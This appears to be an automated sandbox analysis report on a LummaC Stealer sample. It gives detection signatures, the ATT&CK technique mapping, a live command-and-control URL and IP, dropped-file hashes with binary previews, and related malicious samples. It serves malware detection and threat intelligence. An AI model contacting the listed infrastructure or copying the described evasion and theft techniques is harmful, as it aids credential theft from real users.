Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	12 Process Injection	11 Masquerading	11 Input Capture	21 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	17%	Virustotal		Browse
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	21%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\362398\Print.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://techworld2025.top/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
techworld2025.top	104.21.89.159	true	true		unknown
kWEfhpXkjDIXt.kWEfhpXkjDIXt	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://techworld2025.top/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/X	Print.com, 00000011.00000000.1269854515.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp, Isaac.10.dr, Print.com.2.dr	false	high
http://nsis.sf.net/NSIS_ErrorError	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	false	high
https://www.autoitscript.com/autoit3/	Print.com.2.dr, Withdrawal.10.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.89.159	techworld2025.top	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1631822
Start date and time:	2025-03-07 16:22:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe renamed because original name is a hash value
Original Sample Name:	.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/24@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:23:46	API Interceptor	4x Sleep call for process: Print.com modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	lightijak2.1.exe	Get hash	malicious	FormBook	Browse	104.21.45.166
	qUG1ZROxLJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	Checkpoint_News.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	EYv5BQ5NjI.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	jVE64QGXtK.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	x8ggp1u7V8.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	EYv5BQ5NjI.exe	Get hash	malicious	Unknown	Browse	162.159.129.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	U0443.pdf.js	Get hash	malicious	RMSRemoteAdmin	Browse	104.21.89.159
	bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.ps1	Get hash	malicious	LummaC Stealer	Browse	104.21.89.159
	3vnPlay__(Harrison.edwards)__Now_AUD__autoresponse_}.svg	Get hash	malicious	HTMLPhisher	Browse	104.21.89.159
	MITRE Enterprise ATTACK v16.1.xlsx	Get hash	malicious	Mimikatz	Browse	104.21.89.159
	SecuriteInfo.com.Win32.CrypterX-gen.14771.3084.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.89.159
	05 BOIRON F 240700457 ORDEN 05 MAR 2025.xls	Get hash	malicious	Unknown	Browse	104.21.89.159
	xuy.bin.exe	Get hash	malicious	Xmrig	Browse	104.21.89.159
	Quote 09052022-008_1.xlsx	Get hash	malicious	Unknown	Browse	104.21.89.159
	bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.89.159
	AccountFactuur8472.xlsm	Get hash	malicious	KnowBe4	Browse	104.21.89.159

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\362398\Print.com	00000123.exe	Get hash	malicious	Discord Token Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	9FB5#U007e1.EXE.exe	Get hash	malicious	LummaC Stealer	Browse
	wanscam software ocx setup download.exe	Get hash	malicious	LummaC Stealer	Browse
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse
	#Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\362398\Print.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 00000123.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: 9FB5#U007e1.EXE.exe, Detection: malicious, Browse Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse Filename: #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe, Detection: malicious, Browse Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\362398\t

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	533056
Entropy (8bit):	7.999671557082228
Encrypted:	true
SSDEEP:	12288:mqL8m3R8XDUfLfKhwrdcD97/1fc53VrC+f5pfkc4s2b/76U:Am3RyD8fKi0dx4lC+B12/6U
MD5:	8AF5F4294345A8E68FD1B0180DFDC0E0
SHA1:	3B27CDD64500F816FE50BA86F552E7527EBAA812
SHA-256:	EF86E9B53695E8F35D7A6CF4B0DF7B22A044773E648C54A7B49721ECCD0342E5
SHA-512:	F8B75888E12BA920F72EBF148E0E2C257781EF2CCADF16E01A0935B7E4DCF627B193F6422956D212839E2CCAC7044BC3289CCDD1812324FE30D3F2E450EC7A9A
Malicious:	false
Preview:	+....Q$...b.uy..Em.MV#Y.R'..4.S.\|.l.o.\.y.gus.......>..R.uf...@8...4q.{...k...<.$.>..Nj^1.\..f2.....m.<i. o{..u....d.x\|.....w..\|W..1(xO....p..T.(L/ \|.~CC.Y>^.-I.#K.C. u..%....3.+...........A..&.....e......8......n..@.U..~..B.....a...h.}1.b`\...Z..0.'.bm-\|.KCS..........y..@"_.$^S...9?cB...1.b.Rx.....q.....-...&.....p..{.. ..=..M/..Li..O....`..b.$..!.!X..s#..?`.j.".jd..K.e.......(.......HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...0.=.'.F...h.................f.^.....f.^.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....U..,P..Myn.2..t.W....~..."p....n<......W.....f.^.m......'.r..5...x..2).U.j.....>.8#.~.\|.B.....\|.....}....<^..v\|.]3...8..A....c.'.!...K=.l..BV (..g&..n.E.O.D..X..

C:\Users\user\AppData\Local\Temp\Based.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997666973922749
Encrypted:	true
SSDEEP:	1536:m6ApS+dcO2Sy2RrMcKihibo1A+iDNzRHS3/7RwUf6SZI/rU+h8pu/fxjQ:mHKwKt81A3RtS3FNSKMU+8k/fxQ
MD5:	1037C00258074196B331CF3D6490C354
SHA1:	69F53F961A317866AE9AE6E113D5EAAACC1DEE38
SHA-256:	9B333154A0CB2BDF40CB873CC3C6366257B56DADC3B1463F546C06F7C792B649
SHA-512:	AFE87D337E2ED489E8AF68E64568987940753A6DC180ECE108DEEF17D3EEA62AC5804101AF2DAF2C166F4005BA8D6B9C0F105F6456610BACD9D26556AA5CFE07
Malicious:	false
Preview:	+....Q$...b.uy..Em.MV#Y.R'..4.S.\|.l.o.\.y.gus.......>..R.uf...@8...4q.{...k...<.$.>..Nj^1.\..f2.....m.<i. o{..u....d.x\|.....w..\|W..1(xO....p..T.(L/ \|.~CC.Y>^.-I.#K.C. u..%....3.+...........A..&.....e......8......n..@.U..~..B.....a...h.}1.b`\...Z..0.'.bm-\|.KCS..........y..@"_.$^S...9?cB...1.b.Rx.....q.....-...&.....p..{.. ..=..M/..Li..O....`..b.$..!.!X..s#..?`.j.".jd..K.e.......(.......HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...0.=.'.F...h.................f.^.....f.^.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....U..,P..Myn.2..t.W....~..."p....n<......W.....f.^.m......'.r..5...x..2).U.j.....>.8#.~.\|.B.....\|.....}....<^..v\|.]3...8..A....c.'.!...K=.l..BV (..g&..n.E.O.D..X..

C:\Users\user\AppData\Local\Temp\Blvd

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	125952
Entropy (8bit):	6.711920967813209
Encrypted:	false
SSDEEP:	3072:cydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5X:c7HS3zcNPj0nEo3tb2m
MD5:	EF34FAD32970BD4B5EEE7EC758F3E27F
SHA1:	F88E55C04F422048FFB4A0521A036C7736DB958B
SHA-256:	F76D8104DE05DD1964D53D1EEA0B31304C37F68FC97673A1C79C6ACF8C0258D9
SHA-512:	0BA1904C06528EF8EA3145371EC62DE5D4E706DB66066CEBCFB03327DF4BCC006C5E4AEF786013978BE7CC37862CAF653CAD72627ACF6FF347A0DE0544BE4E61
Malicious:	false
Preview:	%....=....u.............%............................L.........E.,K.......K..F\|.M.;........U..}......E.....t/..%....=....u!..G.......%..........E............u...............L.........E.,K.......K............1L..u.t..E.M.<C.F\|...;...m......F\|.].......t ;.r.;.....v..Fh.............{....E....E.@P.u...V.u..u....................V....+.;...;...f..f;F4...........<...f.G.f;F6....................%....................E.......u..............u.....$...E..u..E...w4t..........A..........2;~\|.....f.?.......x...........t.................~l................w<..r.........w...d........[..... ..R....p...........A...._....._ ..w/......... ....E...... ........../ .........(......0...................w<............w................. ..........................._ ..w/........ ........... ........../ ....~.........0....m............w...Z........t........H....f.....( ....Z.....) ....+....I.........w...;....A...........*........................u..............FD...............u......

C:\Users\user\AppData\Local\Temp\Christopher.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997679661755175
Encrypted:	true
SSDEEP:	1536:h6FnfkLu0Bgt/g8zrykwTSpOZzFuB9Su0EwM9nyQAU6DJRs4e2t8XW:hGnyejwfkBku0EwaWN5e2tMW
MD5:	6C400935A419CA4224D2FF88DBA7A3BD
SHA1:	4E67437CCB122888C50FB32632BC421DA24CA16B
SHA-256:	4B56C5ED05E5066FE09A6388DA3B641ECAA0F19EB0A3BD3ED6F11360E21F6279
SHA-512:	BBA5503E18F1D0293E2C1AB39CFC9223C5AC7E0208C6C08CBE236B633E2B8ED570795AFEF8EDD6B755EABA216C710272CE499CA043FB4A5347D5694D54E877EB
Malicious:	false
Preview:	....MT.L.Ez......g..vs..K^.......H..C...\.e...9#...U. ...........].....E.MP^...E....F.y`Vn.z...x....D.rT(.;..m..xU.J..F..Hp2q%.....o...#...^B....:.v.9..d.g.$q.h.t2..M.8_...CcGp...'B..WcBM.h.......,.j..+z...y.`R.....>lw.0.....KS.mF!_....q6..g...Y.NC.....<01..m.).;.gP.....8....j............x5.....!f...9.5......},......;.(....z........y-......TA.:.R../...,."7b}V7...&6t.....BL.@....8.HKJ.\|.f.i?..0.".m...a'q.cl".3.4aT..W.w..6.$.~...0.wS.(..g... ?....a$g.b....h.zt._...m....Q....2Q...0<..s$g..;.e...T..9....mI.(......z..!+..Nv@...F.D..7W]v\.o..?.Ib.}s'm.7....b..M...eT3...A...3.....>..)l..kn.'\|.v.I...`[03.j?.jd...A.[.!.X.L?.8.H.<.J.z.$...\|....T[..=..s......i.2.(.W.A.....6ho..y>P..z....w`p+.......s..y.QS......F}.......7..E.......b...s ..N.d...._..JB....\|P.aPhb#..'...(.@.sD...W...6.........1.GG_V.l5..?.u0...*.....Q`.._..y./..\|.w,O....^"..f'l..s..3...1.b..GT.g.'..com..Lk...A.}O:..Uf.n..oo]..:.."..W....Tt ..(/..wQ..l....W4.......g.a.BQg@V.

C:\Users\user\AppData\Local\Temp\Comparison

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	6.574603769452225
Encrypted:	false
SSDEEP:	1536:tqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+ry:kqVnBypIbv18mLthfhnueoMmOqDoioOy
MD5:	E05ACD80F981BEAA6003AF4E616EB834
SHA1:	FDB9E6943AF353791DCF1DD64F7359E1A887F8F1
SHA-256:	3A08AAC4C83F61709DB4AF62D493B75ECEC23D0C038F1B46BF537F17285092E3
SHA-512:	422794C4F475D1C9458D90EB9C791975F82D0B1673161225E50979996DA89C554DE9BC2B6CDC74C7FDF1A52AB6293D10471D146C63D6D902C2F1C10D71708597
Malicious:	false
Preview:	j..w....:......P....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...S.p....H....".....8\$.t..........x..X..u....1....\|$...F......>.^.u..L$......_^3.[..]...U..S.].VW...{..u:.w.3..t...j........m.....u.C.v...u.........F............C........w.....9.....9.....t..v......"....{..v..C..H..o..................}...........u..?..3.j.j.W.}..!.....j.j.j..X..@.W.E..:I...............E.j.Y.O....G...j.j.Q.X..@..u..E...I...............E..G........G...j........j....].j.j.j.S.E...H...............E..G..............j.j.j.S.E..H..............E.j..G.........j.j..u..X..sH..........g...3..Aj..O...Qj..u..x..MH........d3.+...................tj...t\...t:...t....@..L8.8T8.t..I8.A......L8.8T8.t..I8.Q........x......x..u.........F......>....... .......R.......B....u...E......E..F........c...x..X......x..X..u.........F......>.^..9...@..\|8...L8.t..I8.A......\|8...L8.t..I8.A...M.h..I...._^3.[]...U..........SV.u.W...\|$..~..v..F..H..........3.F..0........F...x..0.G.P.....j.Sh..I.V..$........j..L$..n....u...\|$ .\$$..

C:\Users\user\AppData\Local\Temp\Facilities.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	7.998063301128279
Encrypted:	true
SSDEEP:	1536:twRYtyYPhLKFNuPAeTTpUy7sCVSA+ZhULD9dMUXPH+S9odorAvzaDX6Xfu4d1yDb:iOosK/8AeTxYA+MXTPH7Bcrnu4d1yZF
MD5:	9AAC8948398DA27B9913D7F90C2218AC
SHA1:	A5EB3D6F32C2316EED64F3F2E2E2BE1A5AC3E1E8
SHA-256:	34265BF20DF6594B3DFA606F813AEB443C037BBC99637ECD449FA793A6376C4E
SHA-512:	EE52B393F7BEBBA5303611D63680FC60FC1A03473DEEB5CD574C5B8B8637EDB3D7343D4163F9BFCEE32BEAA9A12359BCFDAD7B986966A3C178411F66F3115C64
Malicious:	false
Preview:	......C...o.gw.RGf(....s..K.\.M...[.f...I=n.vee......%]h...\B`..r. ...'.].9..j..J.1...5.........>P.}.f(..C.!P.mX.\|}w.....f...V\...\L...T."S.v.VE.$..h.k..>......}..U..B!.Q. ...j..yO>....I}.........4....X..g..+..+.w._.7....6.m..xv..-.....<.`......blx..-.....s7.-....\2.v&<}.M_%esj...9-.W6..p....Y.<.......L.-....$..b..X..C%sQ.*.Z..P..8..wE...?..)OP..R.MMAf."4..\E..7_0.&.5.V.u4...7...l..A....Ur..',Ji...I....E..R...\.'.../Qt...8...W.......n....L./Lg!.&..K.5.7<3R{t.Z.u.......Xw...t...I.1v..:#......s@.=......5!...2A../.+.X\|.A...pmP.Yy.. .I^U.J.4.1W_B...3..5..(...?...iu.tkTz.@a.Q.3.D......r...h/..xp....;..-W...@fb.e..y].iymWx..".2j.....qNZ.2&.....e\|..n....&.Yy...(.t.rE._...L....^A.`.&cm?..$Q...6=Qj.{............Hy?...<0sK%..$.....Hx5.HF5....>O..#.'.a.b"...th?N.)5Y..a..T.[w...L.k...P\|.U{{..]..A8iZ.-..34..yEa.zP...w.P..v..o.6......nr..3.L..O..b...F..Q..f.1.....].4..R.J...z.Y(6......$....#...%.._.......l=..qZgEA.#...H......=~....M.(.7....,..Y..4.......]..

C:\Users\user\AppData\Local\Temp\Inserted

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	6.598999314781182
Encrypted:	false
SSDEEP:	1536:RRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+j:RVOoQ7t8T6pUkBJR8CThpmESv+j
MD5:	40B97293CD5EFE440AFEFFF8B568AE4E
SHA1:	61460A6E89A36F7E57B7F222AAFB20440F2C568C
SHA-256:	2D9680E4D5DCF4A3397F7CB7875304400401105A73F5339548F7F2FCA41B9A30
SHA-512:	E6A8D9579FA5D91C87795A6C41908A9DC0E7CC585E508A7A5C99908207556957902F90EBAC412EE8ABE73697D0FDEF3C1434377D5FF63E8715174DDD1F594A60
Malicious:	false
Preview:	......\|........M..y....M..q..._^[..U....S.].3.VW...M..}....E......h.sL....<............V....t..jYf9.t.V....s.......P....F..}..u..u.W....s..3.f9.t.W....s.......P....G..u..}.FV...s..3.f9.t<V...s..jZ.N..M.f9.t.V...s.......P.J....M.....;.t.W......._^[..U.............S.....SPQj.....I.P....I.S......3.Ph....S....I.P....I.8].t%...I.PP......PS......Ph.tL...........h..........P......PS....I.[..U..SVW3..Sh....j.Sj.h...@Q....I......u.2..&9].u.WS...}..Su.SW..WSV....I.V..`.I..._^[].SV..45M.W....T...j.h!.F.V..\|.I.;.t.S......_^[.U..Vh.....L.......$....V.u.....I.f.>.t.W.45M.V...&...h..I........_V.....Y3.@^]...U......T...V..V....I.f.\|F."tV....I....u!.D$.PV....I....t.P....I..D$......^..].U.....E.SVW....PW....I.....u.2.....V....YP.E.3.VPW.E...\|.I..u.V..g..3...j.Z.........Q.[.....h0.I.W..g..h0.I.V.jp.............h8xL.W.Z...h0.I.V.B.......uj.E.P.E.PhXxL..u.....I...t,.E..O j..0Vj.Z.....j.....O(Vj.Z......u......h.xL.W.....YYh0.I.W....VW.........VW....YYh.xL.V.g..YY..uj..G PS.k..

C:\Users\user\AppData\Local\Temp\Isaac

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	5.492115743028522
Encrypted:	false
SSDEEP:	1536:1Kaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATR:p6whxjgarB/5elDWy4ZNoGmu
MD5:	47679B5861746F1517BAE2EF9E4238CE
SHA1:	B193C12B75F3BA10B41FF4BD32D3D24BCBDF56DC
SHA-256:	F483E2EC7B3EA2DA80E323FF6708D7DD67A3C1A799132ED0445942DA05292421
SHA-512:	C2C815AAF39868ACF220CDFE34A61DD7B2A35996A627C74F25E3CCA0B02885122751E5195CC2AE310901E504F2DB32628ED1218326EA5E26F78DC15D8721D112
Malicious:	false
Preview:	.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.C.r.r.r.r.r.r.r.r.r.r.r.D.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.r.r.r.r.r.r.r.r.r.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E.r.r.r.r.r.r.r.r.r.r.E.E.E.E.E.E.E.E.r.r.r.r.r.r.r.r

C:\Users\user\AppData\Local\Temp\Labeled.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	ASCII text, with very long lines (2018), with CRLF line terminators
Category:	dropped
Size (bytes):	34935
Entropy (8bit):	5.087313738825535
Encrypted:	false
SSDEEP:	768:jzjDUGW05G8DVg8npS2wzjMxABDIvbzTVXXihQ69FUWgVDEUcV:EGE8Rwzjz9sU24ghM
MD5:	A7FBFB804E74F83A02711DE41FFB6265
SHA1:	22EEEDA7A692B6CC87F4CEEACCA49117B957813F
